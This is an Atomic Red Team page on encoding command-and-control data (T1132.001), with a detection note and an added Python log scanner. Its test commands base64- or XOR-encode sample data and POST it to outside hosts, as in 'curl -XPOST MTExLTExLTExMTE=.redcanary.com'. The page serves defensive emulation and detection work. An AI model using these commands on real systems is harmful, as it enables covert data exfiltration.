T1132.001 - Standard Encoding
Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.
Atomic Tests
Atomic Test #1 - Base64 Encoded data
Utilizing a common technique for posting base64 encoded data.
Supported Platforms: macos, linux
Attack Commands: Run with sh
echo -n 111-11-1111 | base64
curl -XPOST MTExLTExLTExMTE=.redcanary.com
Invoke-AtomicTest T1132.001 -TestNumbers 1
Atomic Test #2 - Base64 Encoded data (freebsd)
Utilizing a common technique for posting base64 encoded data.
Supported Platforms: linux
Dependencies: Run with sh!
Description: Requires curl
Check Prereq Commands:
if [ -x "$(command -v curl)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
pkg install -y curl
Invoke-AtomicTest T1132.001 -TestNumbers 2 -GetPreReqs
Attack Commands: Run with sh
echo -n 111-11-1111 | b64encode -r -
curl -XPOST MTExLTExLTExMTE=.redcanary.com
Invoke-AtomicTest T1132.001 -TestNumbers 2
Atomic Test #3 - XOR Encoded data
XOR encodes the data with a XOR key.
Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f
Supported Platforms: windows
Attack Commands: Run with powershell
$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim"))
$key = "abcdefghijklmnopqrstuvwxyz123456"
$cyphertext = @();
for ($i = 0; $i -lt $plaintext.Count; $i++) {
$cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive
Invoke-AtomicTest T1132.001 -TestNumbers 3
Detection
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
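As an added example (not part of the Atomic Red Team page or its tests), the following Python scans a constructed host log for hostname labels that decode as base64 to readable text, which is exactly what the two base64 tests above emit (`MTExLTExLTExMTE=.redcanary.com`). It goes slightly beyond the tests by also accepting the URL-safe base64 alphabet; the log format and all hostnames other than the test's label are assumptions.

```python
import base64
import re

# Constructed host log (not from the page): "timestamp src_ip hostname" per line.
# Line 1 mirrors the atomic test's label; line 4 uses URL-safe base64 ('-' for '+').
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 10.0.0.5 MTExLTExLTExMTE=.redcanary.com
2024-01-01T10:00:01Z 10.0.0.5 www.example.com
2024-01-01T10:00:02Z 10.0.0.7 cdn.static-assets.example.net
2024-01-01T10:00:03Z 10.0.0.9 fn5-fn5-.example.test
"""

# Candidate labels: standard or URL-safe base64 characters, at least 8 long.
B64_LABEL = re.compile(r"^[A-Za-z0-9+/=_-]{8,}$")

def decode_label(label):
    """Return decoded bytes if the label is well-formed base64, else None."""
    if not B64_LABEL.match(label):
        return None
    data = label.rstrip("=")
    if len(data) % 4 == 1:  # no base64 string has 4n+1 data characters
        return None
    padded = data + "=" * (-len(data) % 4)
    for altchars in (None, b"-_"):  # standard alphabet first, then URL-safe
        try:
            return base64.b64decode(padded, altchars=altchars, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return None

def is_printable(data, threshold=0.9):
    """True when at least `threshold` of the bytes are printable ASCII."""
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return bool(data) and ok / len(data) >= threshold

def find_encoded_labels(log_text):
    """Flag hostname labels that decode to readable text, as encoded C2 data would."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        ts, src, host = parts[:3]
        for label in host.split("."):
            decoded = decode_label(label)
            if decoded is not None and is_printable(decoded):
                findings.append({"ts": ts, "src": src, "host": host, "label": label,
                                 "decoded": decoded.decode("ascii", "replace")})
    return findings
```

Benign labels such as `static-assets` or `redcanary` are rejected by the length check (4n+1 characters can never be base64), and labels that decode to binary rather than text are dropped by the printable-ratio filter.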